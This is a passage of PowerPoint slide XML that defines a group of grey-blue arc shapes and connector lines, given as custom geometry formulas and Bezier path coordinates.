                <a:gd name="T3" fmla="*/ 0 h 21984"/>
                <a:gd name="T4" fmla="*/ 21600 w 32097"/>
                <a:gd name="T5" fmla="*/ 384 h 21984"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32097" h="21984" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32096" y="19261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28886" y="21047"/>
                    <a:pt x="25273" y="21984"/>
                    <a:pt x="21600" y="21984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21984"/>
                    <a:pt x="0" y="12313"/>
                    <a:pt x="0" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="255"/>
                    <a:pt x="1" y="127"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="32097" h="21984" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32096" y="19261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28886" y="21047"/>
                    <a:pt x="25273" y="21984"/>
                    <a:pt x="21600" y="21984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21984"/>
                    <a:pt x="0" y="12313"/>
                    <a:pt x="0" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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9" name="Arc 1423">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6323B59C-E23A-A94C-B544-C5778E023AA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1560" y="3120"/>
              <a:ext cx="761" cy="337"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 386 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 32039 w 32039"/>
                <a:gd name="T1" fmla="*/ 19296 h 21986"/>
                <a:gd name="T2" fmla="*/ 3 w 32039"/>
                <a:gd name="T3" fmla="*/ 0 h 21986"/>
                <a:gd name="T4" fmla="*/ 21600 w 32039"/>
                <a:gd name="T5" fmla="*/ 386 h 21986"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32039" h="21986" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32038" y="19295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28842" y="21060"/>
                    <a:pt x="25251" y="21986"/>
                    <a:pt x="21600" y="21986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21986"/>
                    <a:pt x="0" y="12315"/>
                    <a:pt x="0" y="386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="257"/>
                    <a:pt x="1" y="128"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="32039" h="21986" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32038" y="19295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28842" y="21060"/>
                    <a:pt x="25251" y="21986"/>
                    <a:pt x="21600" y="21986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21986"/>
                    <a:pt x="0" y="12315"/>
                    <a:pt x="0" y="386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="257"/>
                    <a:pt x="1" y="128"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21600" y="386"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B6C7C9"/>
            </a:solidFill>
            <a:ln w="22225">
              <a:solidFill>
                <a:srgbClr val="6C8F93"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66960" name="Arc 1424">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB6BF822-B150-0341-8B21-FD7A5DF83FDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3626" y="2103"/>
              <a:ext cx="584" cy="427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 4470 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 26070"/>
                <a:gd name="T1" fmla="*/ 468 h 31631"/>
                <a:gd name="T2" fmla="*/ 23599 w 26070"/>
                <a:gd name="T3" fmla="*/ 31631 h 31631"/>
                <a:gd name="T4" fmla="*/ 4470 w 26070"/>
                <a:gd name="T5" fmla="*/ 21600 h 31631"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26070" h="31631" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="467"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1469" y="156"/>
                    <a:pt x="2967" y="0"/>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0"/>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1" name="Arc 1425">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48746FAF-C6FD-D34D-A2F8-9F5312585D19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3628" y="2110"/>
              <a:ext cx="574" cy="418"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 4429 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 26029"/>
                <a:gd name="T1" fmla="*/ 459 h 31708"/>
                <a:gd name="T2" fmla="*/ 23518 w 26029"/>
                <a:gd name="T3" fmla="*/ 31708 h 31708"/>
                <a:gd name="T4" fmla="*/ 4429 w 26029"/>
                <a:gd name="T5" fmla="*/ 21600 h 31708"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26029" h="31708" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="458"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1456" y="153"/>
                    <a:pt x="2940" y="0"/>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0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66962" name="Arc 1426">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{333A199A-4597-D040-A222-606E1D56B176}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3791" y="2534"/>
              <a:ext cx="556" cy="428"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 0 0 0"/>
                <a:gd name="G1" fmla="+- 16794 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 13584 w 21600"/>
                <a:gd name="T1" fmla="*/ 0 h 29154"/>
                <a:gd name="T2" fmla="*/ 17714 w 21600"/>
                <a:gd name="T3" fmla="*/ 29154 h 29154"/>
                <a:gd name="T4" fmla="*/ 0 w 21600"/>
                <a:gd name="T5" fmla="*/ 16794 h 29154"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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3" name="Arc 1427">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F0749D2-3CFC-BF4A-ACAD-2FBC096C61F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3791" y="2538"/>
              <a:ext cx="549" cy="420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 0 0 0"/>
                <a:gd name="G1" fmla="+- 16858 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 13505 w 21600"/>
                <a:gd name="T1" fmla="*/ 0 h 29298"/>
                <a:gd name="T2" fmla="*/ 17658 w 21600"/>
                <a:gd name="T3" fmla="*/ 29298 h 29298"/>
                <a:gd name="T4" fmla="*/ 0 w 21600"/>
                <a:gd name="T5" fmla="*/ 16858 h 29298"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66964" name="Arc 1428">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC7E3766-BC59-894D-AEA6-3D0879563C5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3609" y="2973"/>
              <a:ext cx="651" cy="607"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 7055 0 0"/>
                <a:gd name="G1" fmla="+- 5557 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 27928 w 28655"/>
                <a:gd name="T1" fmla="*/ 0 h 27157"/>
                <a:gd name="T2" fmla="*/ 0 w 28655"/>
                <a:gd name="T3" fmla="*/ 25972 h 27157"/>
                <a:gd name="T4" fmla="*/ 7055 w 28655"/>
                <a:gd name="T5" fmla="*/ 5557 h 27157"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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5" name="Arc 1429">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B88FE95-0531-1548-BD68-52CD1B82B557}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3611" y="2975"/>
              <a:ext cx="642" cy="598"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 7053 0 0"/>
                <a:gd name="G1" fmla="+- 5558 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 27926 w 28653"/>
                <a:gd name="T1" fmla="*/ 0 h 27158"/>
                <a:gd name="T2" fmla="*/ 0 w 28653"/>
                <a:gd name="T3" fmla="*/ 25974 h 27158"/>
                <a:gd name="T4" fmla="*/ 7053 w 28653"/>
                <a:gd name="T5" fmla="*/ 5558 h 27158"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66966" name="Arc 1430">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FE9168B-E7B2-BC44-A35E-9F3E4236AB22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1358" y="2529"/>
              <a:ext cx="354" cy="592"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21551 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 12845 w 21600"/>
                <a:gd name="T1" fmla="*/ 41297 h 41297"/>
                <a:gd name="T2" fmla="*/ 20141 w 21600"/>
                <a:gd name="T3" fmla="*/ 0 h 41297"/>
                <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                <a:gd name="T5" fmla="*/ 21551 h 41297"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="41297" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12844" y="41297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5035" y="37834"/>
                    <a:pt x="0" y="30094"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10187"/>
                    <a:pt x="8803" y="767"/>
                    <a:pt x="20141" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="21600" h="41297" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12844" y="41297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5035" y="37834"/>
                    <a:pt x="0" y="30094"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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7" name="Arc 1431">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B637D19D-EF8C-4C49-B3F4-9F07CC762128}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1365" y="2536"/>
              <a:ext cx="347" cy="578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21551 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 12867 w 21600"/>
                <a:gd name="T1" fmla="*/ 41307 h 41307"/>
                <a:gd name="T2" fmla="*/ 20146 w 21600"/>
                <a:gd name="T3" fmla="*/ 0 h 41307"/>
                <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                <a:gd name="T5" fmla="*/ 21551 h 41307"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="41307" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12867" y="41306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5045" y="37849"/>
                    <a:pt x="0" y="30102"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10186"/>
                    <a:pt x="8806" y="765"/>
                    <a:pt x="20145" y="-1"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="21600" h="41307" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12867" y="41306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5045" y="37849"/>
                    <a:pt x="0" y="30102"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66968" name="Arc 1432">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1F1200-5C13-6A4D-8516-FE15178D6AD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2293" y="3335"/>
              <a:ext cx="1344" cy="361"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21277 0 0"/>
                <a:gd name="G1" fmla="+- 0 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 39224 w 39224"/>
                <a:gd name="T1" fmla="*/ 12019 h 21600"/>
                <a:gd name="T2" fmla="*/ 0 w 39224"/>
                <a:gd name="T3" fmla="*/ 3720 h 21600"/>
                <a:gd name="T4" fmla="*/ 21277 w 39224"/>
                <a:gd name="T5" fmla="*/ 0 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="39224" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39224" y="12019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35214" y="18006"/>
                    <a:pt x="28483" y="21600"/>
                    <a:pt x="21277" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10782" y="21600"/>
                    <a:pt x="1807" y="14057"/>
                    <a:pt x="-1" y="3720"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="39224" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39224" y="12019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35214" y="18006"/>
                    <a:pt x="28483" y="21600"/>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9" name="Arc 1433">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F8EA581-EC2F-9F40-9FD8-F87D5A68B325}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2300" y="3335"/>
              <a:ext cx="1329" cy="354"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21271 0 0"/>
                <a:gd name="G1" fmla="+- 0 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 39161 w 39161"/>
                <a:gd name="T1" fmla="*/ 12103 h 21600"/>
                <a:gd name="T2" fmla="*/ 0 w 39161"/>
                <a:gd name="T3" fmla="*/ 3756 h 21600"/>
                <a:gd name="T4" fmla="*/ 21271 w 39161"/>
                <a:gd name="T5" fmla="*/ 0 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="39161" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39161" y="12103"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35143" y="18042"/>
                    <a:pt x="28441" y="21600"/>
                    <a:pt x="21271" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10790" y="21600"/>
                    <a:pt x="1822" y="14076"/>
                    <a:pt x="0" y="3755"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="39161" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39161" y="12103"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35143" y="18042"/>
                    <a:pt x="28441" y="21600"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66970" name="Line 1434">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDEE7D87-3137-F449-8C73-9CC069035C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3538511" y="2085288"/>
            <a:ext cx="280469" cy="49597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1" name="Line 1435">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F944C2FE-2ECB-FA42-91BA-855FF7560371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3864932" y="2361003"/>
            <a:ext cx="608473" cy="22025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2" name="Line 1436">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B2C086-B5D1-354C-9AE0-F5F91E1D55E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3818980" y="2636718"/>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3" name="Line 1437">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08C5FB93-A9E5-2B4F-8D79-97B76CC79AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4519358" y="2361003"/>
            <a:ext cx="510230" cy="153703"/>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4" name="Line 1438">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A833252E-6A50-E447-952C-0DAE8C6F0335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4238889" y="2590765"/>
            <a:ext cx="790699" cy="43100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5" name="Line 1439">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86655944-CDDD-1249-9326-20BDC4092652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5202305" y="2289698"/>
            <a:ext cx="1028384" cy="11250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6" name="Line 1440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C4201D-2412-754A-AAFC-08DF4B269D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5248258" y="2402202"/>
